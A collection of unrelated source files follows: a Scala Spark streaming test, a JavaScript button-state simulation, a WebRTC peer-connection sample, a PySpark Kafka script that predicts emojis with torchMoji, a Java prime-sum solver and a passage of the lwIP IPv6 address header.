      fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
        assert(status.isDirectory)
      })
      assert(fs.exists(new org.apache.hadoop.fs.Path(checkpointLocation)))
      val hdfs = HDFSDataConnector("TestConnector", None, None)
      val readOptions = DataFrameReaderOptions(schema = Some(Schema.fromStructType(dataFrame.schema)))
      val df = hdfs.load(Some(path), ctx, readOptions)
      assert(df.count() == Constants.TWENTY)
    }

    it("Should run a batch file stream") {
      // Output path
      val path = miniCluster.getURI + "/metalus/data/socket_file.parquet"
      val checkpointLocation = s"${miniCluster.getURI}/metalus/data/streaming_file_checkpoint"
      // Batch monitor: stop after every 10 records; roll the output path using a date template.
      val ctx = pipelineContext.setGlobal("STREAMING_BATCH_MONITOR_TYPE", "count")
        .setGlobal("STREAMING_BATCH_MONITOR_COUNT", Constants.TEN)
        .setGlobal("STREAMING_BATCH_OUTPUT_TEMPLATE", "date")
        .setGlobal("STREAMING_BATCH_OUTPUT_GLOBAL", "destinationPath")
        .setGlobal("STREAMING_BATCH_OUTPUT_PATH_KEY", "socket_file")
        .setGlobal("destinationPath", path)
      val port = Random.nextInt(Constants.ONE_HUNDRED) + Constants.NINE_THOUSAND
      // Output
      val writeOptions = DataFrameWriterOptions(saveMode = "append",
        options = Some(Map("checkpointLocation" -> checkpointLocation)))
      // Setup the server
      val server = new ServerSocket(port)
      val dataFrame = getReadStream(port, None, None)
      // Start the query
      val query = Some(DataConnectorUtilities.buildDataStreamWriter(dataFrame, writeOptions, path).start())
      // Write Data
      val socket = sendRecords(server, Constants.TEN)
      val monitor = Some("com.acxiom.pipeline.streaming.BatchFileStreamingQueryMonitor")
      // Thread the step
      val future = Future {
        FlowUtilsSteps.monitorStreamingQuery(query, monitor, ctx)
      }
      val f = Await.ready(future, Duration.Inf)
      assert(f.isCompleted)
      socket.close()
      server.close()
      // Verify that anything within the path is a file unless it is the _spark_metadata directory
      fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
        assert(!status.isDirectory || status.getPath.toString == s"$path/_spark_metadata")
      })
      val response = f.value.get.get
      assert(response.primaryReturn.getOrElse("continue") == "continue")
      assert(response.namedReturns.isDefined)
      assert(response.namedReturns.get.contains("$globals.destinationPath"))
      val updatedPath = response.namedReturns.get("$globals.destinationPath").asInstanceOf[String]
      // Expected file name: "socket_file_" + date suffix + ".parquet" == 43 characters
      assert(updatedPath.substring(updatedPath.lastIndexOf("/") + 1).length == 43)
      assert(updatedPath.substring(updatedPath.lastIndexOf("/") + 1).startsWith("socket_file_"))
      assert(updatedPath.substring(updatedPath.lastIndexOf("/") + 1).endsWith(".parquet"))
      assert(fs.exists(new org.apache.hadoop.fs.Path(checkpointLocation)))
      val hdfs = HDFSDataConnector("TestConnector", None, None)
      val readOptions = DataFrameReaderOptions(schema = Some(Schema.fromStructType(dataFrame.schema)))
      val df = hdfs.load(Some(path), ctx, readOptions)
      assert(df.count() == Constants.TEN)
    }
  }

  /**
   * Build a streaming DataFrame reading lines from a local socket, optionally
   * adding a literal partition column.
   * NOTE(review): "paritionValue" is a typo for partitionValue; private API, kept as-is.
   */
  private def getReadStream(port: Int, partitionColumn: Option[String], paritionValue: Option[String] = None): DataFrame = {
    val df = sparkSession.readStream.format("socket")
      .option("host", "127.0.0.1").option("port", port).load()
    if (partitionColumn.isDefined) {
      df.withColumn(partitionColumn.get, lit(paritionValue.getOrElse("zero")))
    } else {
      df
    }
  }

  /**
   * Accept one client connection on the server socket and write count
   * newline-terminated records to it. Returns the accepted socket so the
   * caller can close it once the query has consumed the data.
   */
  private def sendRecords(server: ServerSocket, count: Int): Socket = {
    val socket = server.accept()
    val socketStream = socket.getOutputStream
    val output = new OutputStreamWriter(socketStream)
    (1 to count).toList.foreach(count => {
      output.write(s"record$count\n")
    })
    output.flush()
    output.close()
    socket
  }
}
|
/** State holder for a single physical button. */
class CommonButton {
  /**
   * @param {number} buttonId identifier of the button (a DAL.BUTTON_ID_* value)
   */
  constructor(buttonId) {
    // A freshly constructed button starts unpressed.
    Object.assign(this, { buttonId, isPressed: false });
  }
}
/** Placeholder for a memory-mapped device interface. */
class MMapMethods {
  /**
   * Register a callback for a memory-mapped device. Simulation only — this is
   * intentionally a no-op.
   * @param {string} device device node path (e.g. "/dev/lms_ui")
   * @param {Function} callback invoked with raw device data
   */
  static register(device, callback) {
    // No-op: a real implementation would hook into the device here.
  }
}
// Device abstraction layer: numeric ids for the six physical buttons.
class DAL {
  static BUTTON_ID_UP = 0;
  static BUTTON_ID_ENTER = 1;
  static BUTTON_ID_DOWN = 2;
  static BUTTON_ID_RIGHT = 3;
  static BUTTON_ID_LEFT = 4;
  static BUTTON_ID_ESCAPE = 5;
}
/**
 * UI facade over the six hardware buttons. Keeps a packed byte-per-button
 * state that can be refreshed from per-button flags or overwritten by the
 * (simulated) memory-mapped device callback.
 */
class SimpleUI {
  constructor() {
    this.buttons = [
      new CommonButton(DAL.BUTTON_ID_UP),
      new CommonButton(DAL.BUTTON_ID_ENTER),
      new CommonButton(DAL.BUTTON_ID_DOWN),
      new CommonButton(DAL.BUTTON_ID_RIGHT),
      new CommonButton(DAL.BUTTON_ID_LEFT),
      new CommonButton(DAL.BUTTON_ID_ESCAPE)
    ];
    // Packed state: one byte per button, 1 = pressed.
    this.buttonState = new Uint8Array(this.buttons.length).fill(0);
    MMapMethods.register("/dev/lms_ui", this.handleMemoryMappedCallback.bind(this));
  }

  /**
   * Callback for the simulated memory-mapped interface.
   * @param {ArrayLike<number>} data raw button-state bytes from the device
   */
  handleMemoryMappedCallback(data) {
    this.buttonState = new Uint8Array(data);
  }

  /**
   * Mark the button with the given id as pressed and refresh the packed
   * state. Unknown ids are ignored.
   * @param {number} buttonId one of the DAL.BUTTON_ID_* constants
   */
  handleButtonPress(buttonId) {
    const button = this.buttons.find((btn) => btn.buttonId === buttonId);
    if (button) {
      button.isPressed = true;
      this.updateButtonState();
    }
  }

  /** Rebuild the packed state from the per-button isPressed flags. */
  updateButtonState() {
    // Fix: Array.prototype.map returns a plain Array, silently changing the
    // type of buttonState. Keep it a Uint8Array so it stays consistent with
    // the constructor and handleMemoryMappedCallback.
    this.buttonState = Uint8Array.from(this.buttons, (btn) => (btn.isPressed ? 1 : 0));
  }

  /** @return {Uint8Array} the current packed button state */
  getCurrentButtonState() {
    return this.buttonState;
  }
}
// Usage: press ENTER and dump the packed button state.
const ui = new SimpleUI();
ui.handleButtonPress(DAL.BUTTON_ID_ENTER);
console.log(ui.getCurrentButtonState()); // Expected values: [0, 1, 0, 0, 0, 0] — 1 at the ENTER index
/*
* Copyright (c) 2020 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree.
*/
'use strict';
/**
* Sends a MediaStream to one end of an RTCPeerConnection and provides the
* remote end as the resulting MediaStream.
* In an actual video calling app, the two RTCPeerConnection objects would be
* instantiated on different devices. However, in this sample, both sides of the
* peer connection are local to allow the sample to be self-contained.
* For more detailed samples using RTCPeerConnection, take a look at
* https://webrtc.github.io/samples/.
*/
class PeerConnectionPipe { // eslint-disable-line no-unused-vars
  /**
   * @param {!MediaStream} inputStream stream to pipe over the peer connection
   * @param {string} debugPath the path to this object from the debug global var
   */
  constructor(inputStream, debugPath) {
    /**
     * @private @const {!RTCPeerConnection} the calling side of the peer
     * connection, connected to inputStream_.
     */
    this.caller_ = new RTCPeerConnection(null);
    /**
     * @private @const {!RTCPeerConnection} the answering side of the peer
     * connection, providing the stream returned by getMediaStream.
     */
    this.callee_ = new RTCPeerConnection(null);
    /** @private {string} */
    this.debugPath_ = debugPath;
    /**
     * @private @const {!Promise<!MediaStream>} the stream containing tracks
     * from callee_, returned by getMediaStream.
     */
    this.outputStreamPromise_ = this.init_(inputStream);
  }
  /**
   * Sets the path to this object from the debug global var.
   * @param {string} path
   */
  setDebugPath(path) {
    this.debugPath_ = path;
  }
  /**
   * Wires caller_ and callee_ together (ICE exchange plus offer/answer) and
   * resolves with a MediaStream holding one received track per input track.
   * @param {!MediaStream} inputStream stream to pipe over the peer connection
   * @return {!Promise<!MediaStream>}
   * @private
   */
  async init_(inputStream) {
    console.log(
        '[PeerConnectionPipe] Initiating peer connection.',
        `${this.debugPath_} =`, this);
    // Both peers live in the same page, so ICE candidates are handed over
    // directly instead of going through a signaling channel.
    this.caller_.onicecandidate = (/** !RTCPeerConnectionIceEvent*/ event) => {
      if (event.candidate) this.callee_.addIceCandidate(event.candidate);
    };
    this.callee_.onicecandidate = (/** !RTCPeerConnectionIceEvent */ event) => {
      if (event.candidate) this.caller_.addIceCandidate(event.candidate);
    };
    const outputStream = new MediaStream();
    // Resolves once callee_ has received as many tracks as the input holds.
    const receiverStreamPromise = new Promise(resolve => {
      this.callee_.ontrack = (/** !RTCTrackEvent */ event) => {
        outputStream.addTrack(event.track);
        if (outputStream.getTracks().length == inputStream.getTracks().length) {
          resolve(outputStream);
        }
      };
    });
    inputStream.getTracks().forEach(track => {
      this.caller_.addTransceiver(track, {direction: 'sendonly'});
    });
    // Parameterless setLocalDescription() creates the offer/answer implicitly.
    await this.caller_.setLocalDescription();
    await this.callee_.setRemoteDescription(
        /** @type {!RTCSessionDescription} */ (this.caller_.localDescription));
    await this.callee_.setLocalDescription();
    await this.caller_.setRemoteDescription(
        /** @type {!RTCSessionDescription} */ (this.callee_.localDescription));
    await receiverStreamPromise;
    console.log(
        '[PeerConnectionPipe] Peer connection established.',
        `${this.debugPath_}.caller_ =`, this.caller_,
        `${this.debugPath_}.callee_ =`, this.callee_);
    return receiverStreamPromise;
  }
  /**
   * Provides the MediaStream that has been piped through a peer connection.
   * @return {!Promise<!MediaStream>}
   */
  getOutputStream() {
    return this.outputStreamPromise_;
  }
  /**
   * Frees any resources used by this object. Closes both peer connections;
   * it does not stop the input stream's tracks.
   */
  destroy() {
    console.log('[PeerConnectionPipe] Closing peer connection.');
    this.caller_.close();
    this.callee_.close();
  }
}
|
<reponame>krisuety/Torchmoji_pyspark
from __future__ import print_function, division, unicode_literals
import example_helper
import json
import csv
import argparse
import numpy as np
import emoji
from torchmoji.sentence_tokenizer import SentenceTokenizer
from torchmoji.model_def import torchmoji_emojis
from torchmoji.global_variables import PRETRAINED_PATH, VOCAB_PATH
from pyspark.sql.functions import udf
from pyspark.sql.functions import col
#d = [{'content': 'This is shit'}, {'content': 'I love you'}]
from pyspark.sql.session import SparkSession

# Shared Spark session for the whole script.
SPARK = SparkSession.builder.getOrCreate()
#df = SPARK.createDataFrame(d)

# The 64 emoji aliases emitted by the torchMoji model, index-aligned with the
# model's output probabilities.
EMOJIS = ":joy: :unamused: :weary: :sob: :heart_eyes: \
:pensive: :ok_hand: :blush: :heart: :smirk: \
:grin: :notes: :flushed: :100: :sleeping: \
:relieved: :relaxed: :raised_hands: :two_hearts: :expressionless: \
:sweat_smile: :pray: :confused: :kissing_heart: :heartbeat: \
:neutral_face: :information_desk_person: :disappointed: :see_no_evil: :tired_face: \
:v: :sunglasses: :rage: :thumbsup: :cry: \
:sleepy: :yum: :triumph: :hand: :mask: \
:clap: :eyes: :gun: :persevere: :smiling_imp: \
:sweat: :broken_heart: :yellow_heart: :musical_note: :speak_no_evil: \
:wink: :skull: :confounded: :smile: :stuck_out_tongue_winking_eye: \
:angry: :no_good: :muscle: :facepunch: :purple_heart: \
:sparkling_heart: :blue_heart: :grimacing: :sparkles:".split(' ')
def top_elements(array, k):
    """Return the indices of the k largest values in *array*, sorted descending.

    argpartition isolates the top-k set in O(n); only those k entries are then
    fully ordered.
    """
    top_k = np.argpartition(array, -k)[-k:]
    descending = np.argsort(array[top_k])[::-1]
    return top_k[descending]
# Load the torchMoji vocabulary and build the tokenizer and model once at
# module import time so the Spark UDF below can reuse them per record.
with open(VOCAB_PATH, 'r') as f:
    vocabulary = json.load(f)
st = SentenceTokenizer(vocabulary, 30)  # 30 = max tokens per sentence
model = torchmoji_emojis(PRETRAINED_PATH)
def sentence_to_emoji_fun(sentence):
    """Return the top-5 predicted emojis for *sentence* as one string.

    Tokenizes with the module-level SentenceTokenizer, scores with the
    torchMoji model, and renders the five most probable emoji aliases
    via emoji.emojize.
    """
    tokenized, _, _ = st.tokenize_sentences([sentence])
    prob = model(tokenized)[0]
    emoji_ids = top_elements(prob, 5)
    # Join the predicted aliases and render them as unicode emoji.
    aliases = ''.join(EMOJIS[i] for i in emoji_ids)
    return emoji.emojize(aliases, use_aliases=True)
from pyspark.sql.types import StringType

# Spark UDF wrapping the emoji predictor.
get_emoji = udf(lambda s: sentence_to_emoji_fun(s), StringType())

import requests
import findspark
findspark.init()
import pyspark
from pyspark.sql import SparkSession

# NOTE(review): this is a second SparkSession handle; builder.getOrCreate()
# should return the session already created above as SPARK — confirm whether
# one of the two can be removed.
spark = SparkSession.builder.getOrCreate()
from pyspark.sql.types import *
from pyspark.sql.functions import *
spark.sparkContext.setLogLevel("ERROR")

# Read the "test" topic from a local Kafka broker as a streaming DataFrame,
# cast key/value to strings, and keep only the value column.
kafka_df = spark.readStream.format("kafka").option("kafka.bootstrap.servers", "localhost:9092").option("subscribe", "test").load()
kafka_df_string = kafka_df.select(col("key").cast("STRING").alias("key"),col("value").cast("STRING").alias("value"))
kafka_df_string_2 = kafka_df_string.select(col("value"))

# Attach the predicted emojis as a new column.
new = kafka_df_string_2.withColumn("emoji", get_emoji(kafka_df_string_2.value))
#result = kafka_df_string_2.select(get_emoji(col('value')))
#result = [r['<lambda>(content)'] for r in result]
#print(result)

# Stream the enriched rows to the console every 3 seconds until terminated.
output = new.writeStream.outputMode("append").format("console").option("truncate", "false").trigger(processingTime="3 seconds").start()
#output = result.writeStream.outputMode("append").format("console").option("truncate", "false").trigger(processingTime="3 seconds").start()
#def send_df_to_dashboard(df, id):
#    tag = [str(t.value) for t in df.select("emoji").take(10)]
#    url = 'http://localhost:8050/update_data'
#    request_data = {'emoji' : str(emoji)} #request_data = {'tag': str(tag), 'tag_count': str(tag_count)}
#    print('update dashboard')
#    response = requests.post(url, data=request_data)
#new.writeStream.outputMode("complete").foreachBatch(send_df_to_dashboard).trigger(processingTime="3 seconds").start()
#def send_df_to_dashboard(df, id):
#    tag = [str(t.value) for t in df.select("value").take(10)]
#url = 'http://localhost:8050/update_data'
#request_data = {'value' : str(value)} #request_data = {'tag': str(tag), 'tag_count': str(tag_count)}
#print('update dashboard')
#response = requests.post(url, data=request_data)
#kafka_df_string_2.writeStream.outputMode("complete").foreachBatch(send_df_to_dashboard).trigger(processingTime="3 seconds").start()
output.awaitTermination()
#result = df.select(get_emoji(col('content'))).collect()
#result = [r['<lambda>(content)'] for r in result]
#print(result)
|
module.exports = {
greeting: 'Hello Global Data!',
currentYear: new Date().getFullYear(),
};
|
package two_pointer;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
/**
 *
 * @author minchoba
 * BOJ #1644: Sum of Consecutive Primes
 *
 * @see https://www.acmicpc.net/problem/1644/
 *
 */
public class Boj1644 {
    private static final int INF = 4_000_001; // exclusive upper bound for the sieve
    private static boolean[] isPrime = new boolean[INF]; // sieve flags
    private static int[] seq = new int[INF]; // primes in ascending order
    private static int idx = 0; // number of primes stored in seq

    public static void main(String[] args) throws Exception{
        // Read the input value via a buffered reader
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
        int N = Integer.parseInt(br.readLine());

        prime(); // Precompute all primes below INF with the sieve

        Pointer ptr = new Pointer(0, 0);
        int res = 0;
        int sum = 0;
        while(ptr.end <= idx) { // Run the two-pointer scan over the prime sequence
            if(sum < N) {
                sum += seq[ptr.end++];
                continue;
            }
            if(sum == N) res++;
            sum -= seq[ptr.start++];
        }
        System.out.println(res); // Number of ways N is a sum of consecutive primes
    }

    /**
     * Two-pointer window (start/end indices into seq).
     * @author minchoba
     *
     */
    private static class Pointer{
        int start;
        int end;

        public Pointer(int start, int end) {
            this.start = start;
            this.end = end;
        }
    }

    /**
     * Compute all primes below INF and pack them into seq.
     *
     */
    private static void prime() {
        Arrays.fill(isPrime, true);
        isPrime[0] = isPrime[1] = false;

        for(int i = 2; i < INF; i++) { // Sieve of Eratosthenes
            if(!isPrime[i]) continue;
            for(int j = i + i; j < INF; j += i) {
                isPrime[j] = false;
            }
        }

        for(int i = 0; i < INF; i++) { // Copy the surviving primes into seq
            if(isPrime[i]) seq[idx++] = i;
        }
    }
}
|
/**
* @file
*
* IPv6 addresses.
*/
/*
* Copyright (c) 2010 Inico Technologies Ltd.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
* SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
* OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
* IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
* OF SUCH DAMAGE.
*
* This file is part of the lwIP TCP/IP stack.
*
* Author: <NAME> <<EMAIL>>
*
* Structs and macros for handling IPv6 addresses.
*
* Please coordinate changes and requests with Ivan Delamer
* <<EMAIL>>
*/
#ifndef LWIP_HDR_IP6_ADDR_H
#define LWIP_HDR_IP6_ADDR_H
#include "lwip/opt.h"
#include "def.h"
#if LWIP_IPV6 /* don't build if not configured for use in lwipopts.h */
#ifdef __cplusplus
extern "C" {
#endif
/** This is the aligned version of ip6_addr_t,
    used as local variable, on the stack, etc. */
struct ip6_addr {
  u32_t addr[4];
};

/** IPv6 address */
typedef struct ip6_addr ip6_addr_t;

/** Set an IPv6 partial address given by byte-parts; index selects which of
    the four 32-bit words to set. */
#define IP6_ADDR_PART(ip6addr, index, a,b,c,d) \
  (ip6addr)->addr[index] = PP_HTONL(LWIP_MAKEU32(a,b,c,d))

/** Set a full IPv6 address by passing the 4 u32_t indices in network byte order
    (use PP_HTONL() for constants) */
#define IP6_ADDR(ip6addr, idx0, idx1, idx2, idx3) do { \
  (ip6addr)->addr[0] = idx0; \
  (ip6addr)->addr[1] = idx1; \
  (ip6addr)->addr[2] = idx2; \
  (ip6addr)->addr[3] = idx3; } while(0)

/* The BLOCKn macros access the eight 16-bit groups of the textual notation
   (1-based, most significant first), returned in host byte order. */
/** Access address in 16-bit block 1 */
#define IP6_ADDR_BLOCK1(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[0]) >> 16) & 0xffff))
/** Access address in 16-bit block 2 */
#define IP6_ADDR_BLOCK2(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[0])) & 0xffff))
/** Access address in 16-bit block 3 */
#define IP6_ADDR_BLOCK3(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[1]) >> 16) & 0xffff))
/** Access address in 16-bit block 4 */
#define IP6_ADDR_BLOCK4(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[1])) & 0xffff))
/** Access address in 16-bit block 5 */
#define IP6_ADDR_BLOCK5(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[2]) >> 16) & 0xffff))
/** Access address in 16-bit block 6 */
#define IP6_ADDR_BLOCK6(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[2])) & 0xffff))
/** Access address in 16-bit block 7 */
#define IP6_ADDR_BLOCK7(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[3]) >> 16) & 0xffff))
/** Access address in 16-bit block 8 */
#define IP6_ADDR_BLOCK8(ip6addr) ((u16_t)((lwip_htonl((ip6addr)->addr[3])) & 0xffff))

/** Copy IPv6 address - faster than ip6_addr_set: no NULL check */
#define ip6_addr_copy(dest, src) do{(dest).addr[0] = (src).addr[0]; \
                                    (dest).addr[1] = (src).addr[1]; \
                                    (dest).addr[2] = (src).addr[2]; \
                                    (dest).addr[3] = (src).addr[3];}while(0)
/** Safely copy one IPv6 address to another (src may be NULL) */
#define ip6_addr_set(dest, src) do{(dest)->addr[0] = (src) == NULL ? 0 : (src)->addr[0]; \
                                   (dest)->addr[1] = (src) == NULL ? 0 : (src)->addr[1]; \
                                   (dest)->addr[2] = (src) == NULL ? 0 : (src)->addr[2]; \
                                   (dest)->addr[3] = (src) == NULL ? 0 : (src)->addr[3];}while(0)

/** Set complete address to zero */
#define ip6_addr_set_zero(ip6addr) do{(ip6addr)->addr[0] = 0; \
                                      (ip6addr)->addr[1] = 0; \
                                      (ip6addr)->addr[2] = 0; \
                                      (ip6addr)->addr[3] = 0;}while(0)

/** Set address to ipv6 'any' (no need for lwip_htonl()) */
#define ip6_addr_set_any(ip6addr) ip6_addr_set_zero(ip6addr)

/** Set address to the ipv6 loopback address (::1) */
#define ip6_addr_set_loopback(ip6addr) do{(ip6addr)->addr[0] = 0; \
                                          (ip6addr)->addr[1] = 0; \
                                          (ip6addr)->addr[2] = 0; \
                                          (ip6addr)->addr[3] = PP_HTONL(0x00000001UL);}while(0)

/** Safely copy one IPv6 address to another and change byte order
 * from host- to network-order. */
#define ip6_addr_set_hton(dest, src) do{(dest)->addr[0] = (src) == NULL ? 0 : lwip_htonl((src)->addr[0]); \
                                        (dest)->addr[1] = (src) == NULL ? 0 : lwip_htonl((src)->addr[1]); \
                                        (dest)->addr[2] = (src) == NULL ? 0 : lwip_htonl((src)->addr[2]); \
                                        (dest)->addr[3] = (src) == NULL ? 0 : lwip_htonl((src)->addr[3]);}while(0)
/**
* Determine if two IPv6 address are on the same network.
*
* @arg addr1 IPv6 address 1
* @arg addr2 IPv6 address 2
* @return !0 if the network identifiers of both address match
*/
/* Compare only the network identifier (first 64 bits) of two IPv6 addresses. */
#define ip6_addr_netcmp(addr1, addr2) (((addr1)->addr[0] == (addr2)->addr[0]) && \
                                       ((addr1)->addr[1] == (addr2)->addr[1]))
/* Full 128-bit equality comparison of two IPv6 addresses. */
#define ip6_addr_cmp(addr1, addr2) (((addr1)->addr[0] == (addr2)->addr[0]) && \
                                    ((addr1)->addr[1] == (addr2)->addr[1]) && \
                                    ((addr1)->addr[2] == (addr2)->addr[2]) && \
                                    ((addr1)->addr[3] == (addr2)->addr[3]))
/* Extract the 16-bit subnet identifier (low half of the third 32-bit word). */
#define ip6_get_subnet_id(ip6addr)  (lwip_htonl((ip6addr)->addr[2]) & 0x0000ffffUL)
/* True if the address value is all zero (the unspecified address "::"). */
#define ip6_addr_isany_val(ip6addr) (((ip6addr).addr[0] == 0) && \
                                     ((ip6addr).addr[1] == 0) && \
                                     ((ip6addr).addr[2] == 0) && \
                                     ((ip6addr).addr[3] == 0))
/* Pointer-taking variant of ip6_addr_isany_val: NULL also counts as "any". */
#define ip6_addr_isany(ip6addr) (((ip6addr) == NULL) || ip6_addr_isany_val(*(ip6addr)))
/* True for the loopback address "::1". */
#define ip6_addr_isloopback(ip6addr) (((ip6addr)->addr[0] == 0UL) && \
                                      ((ip6addr)->addr[1] == 0UL) && \
                                      ((ip6addr)->addr[2] == 0UL) && \
                                      ((ip6addr)->addr[3] == PP_HTONL(0x00000001UL)))
/* Scope classification: each predicate tests the well-known prefix bits of
 * the first 32-bit word (stored in network byte order, hence PP_HTONL). */
#define ip6_addr_isglobal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xe0000000UL)) == PP_HTONL(0x20000000UL))
#define ip6_addr_islinklocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xffc00000UL)) == PP_HTONL(0xfe800000UL))
#define ip6_addr_issitelocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xffc00000UL)) == PP_HTONL(0xfec00000UL))
#define ip6_addr_isuniquelocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xfe000000UL)) == PP_HTONL(0xfc000000UL))
/* True for an IPv4-mapped IPv6 address (::ffff:x.x.x.x). */
#define ip6_addr_isipv6mappedipv4(ip6addr) (((ip6addr)->addr[0] == 0) && ((ip6addr)->addr[1] == 0) && (((ip6addr)->addr[2]) == PP_HTONL(0x0000FFFFUL)))
/* Multicast addresses start with 0xff. */
#define ip6_addr_ismulticast(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff000000UL)) == PP_HTONL(0xff000000UL))
/* Multicast flag bits (T/P/R) from the flags nibble of the first word. */
#define ip6_addr_multicast_transient_flag(ip6addr)  ((ip6addr)->addr[0] & PP_HTONL(0x00100000UL))
#define ip6_addr_multicast_prefix_flag(ip6addr)     ((ip6addr)->addr[0] & PP_HTONL(0x00200000UL))
#define ip6_addr_multicast_rendezvous_flag(ip6addr) ((ip6addr)->addr[0] & PP_HTONL(0x00400000UL))
/* Extract the 4-bit multicast scope field. */
#define ip6_addr_multicast_scope(ip6addr) ((lwip_htonl((ip6addr)->addr[0]) >> 16) & 0xf)
/* Multicast scope values, as returned by ip6_addr_multicast_scope(). */
#define IP6_MULTICAST_SCOPE_RESERVED            0x0
#define IP6_MULTICAST_SCOPE_RESERVED0           0x0
#define IP6_MULTICAST_SCOPE_INTERFACE_LOCAL     0x1
#define IP6_MULTICAST_SCOPE_LINK_LOCAL          0x2
#define IP6_MULTICAST_SCOPE_RESERVED3           0x3
#define IP6_MULTICAST_SCOPE_ADMIN_LOCAL         0x4
#define IP6_MULTICAST_SCOPE_SITE_LOCAL          0x5
#define IP6_MULTICAST_SCOPE_ORGANIZATION_LOCAL  0x8
#define IP6_MULTICAST_SCOPE_GLOBAL              0xe
#define IP6_MULTICAST_SCOPE_RESERVEDF           0xf
/* Multicast scope predicates: mask out the flag bits, compare the scope. */
#define ip6_addr_ismulticast_iflocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff010000UL))
#define ip6_addr_ismulticast_linklocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff020000UL))
#define ip6_addr_ismulticast_adminlocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff040000UL))
#define ip6_addr_ismulticast_sitelocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff050000UL))
#define ip6_addr_ismulticast_orglocal(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff080000UL))
#define ip6_addr_ismulticast_global(ip6addr) (((ip6addr)->addr[0] & PP_HTONL(0xff8f0000UL)) == PP_HTONL(0xff0e0000UL))
/* @todo define get/set for well-known multicast addresses, e.g. ff02::1
 * (the all-nodes link-local address tested below). */
/* True for the interface-local all-nodes multicast address ff01::1. */
#define ip6_addr_isallnodes_iflocal(ip6addr) (((ip6addr)->addr[0] == PP_HTONL(0xff010000UL)) && \
                                              ((ip6addr)->addr[1] == 0UL) && \
                                              ((ip6addr)->addr[2] == 0UL) && \
                                              ((ip6addr)->addr[3] == PP_HTONL(0x00000001UL)))
/* True for the link-local all-nodes multicast address ff02::1. */
#define ip6_addr_isallnodes_linklocal(ip6addr) (((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
                                                ((ip6addr)->addr[1] == 0UL) && \
                                                ((ip6addr)->addr[2] == 0UL) && \
                                                ((ip6addr)->addr[3] == PP_HTONL(0x00000001UL)))
/* Set the address to the link-local all-nodes multicast address ff02::1. */
#define ip6_addr_set_allnodes_linklocal(ip6addr) do{(ip6addr)->addr[0] = PP_HTONL(0xff020000UL); \
                                                    (ip6addr)->addr[1] = 0; \
                                                    (ip6addr)->addr[2] = 0; \
                                                    (ip6addr)->addr[3] = PP_HTONL(0x00000001UL);}while(0)
/* True for the link-local all-routers multicast address ff02::2. */
#define ip6_addr_isallrouters_linklocal(ip6addr) (((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
                                                  ((ip6addr)->addr[1] == 0UL) && \
                                                  ((ip6addr)->addr[2] == 0UL) && \
                                                  ((ip6addr)->addr[3] == PP_HTONL(0x00000002UL)))
/* Set the address to the link-local all-routers multicast address ff02::2. */
#define ip6_addr_set_allrouters_linklocal(ip6addr) do{(ip6addr)->addr[0] = PP_HTONL(0xff020000UL); \
                                                      (ip6addr)->addr[1] = 0; \
                                                      (ip6addr)->addr[2] = 0; \
                                                      (ip6addr)->addr[3] = PP_HTONL(0x00000002UL);}while(0)
/* True for a solicited-node multicast address (ff02::1:ffXX:XXXX).
 * Note: addr[1] is not checked here; addr[2] == ::1 is. */
#define ip6_addr_issolicitednode(ip6addr) ( ((ip6addr)->addr[0] == PP_HTONL(0xff020000UL)) && \
                                            ((ip6addr)->addr[2] == PP_HTONL(0x00000001UL)) && \
                                            (((ip6addr)->addr[3] & PP_HTONL(0xff000000UL)) == PP_HTONL(0xff000000UL)) )
/* Build the solicited-node multicast address for an interface identifier.
 * if_id must already contain only the low 24 bits, in network order. */
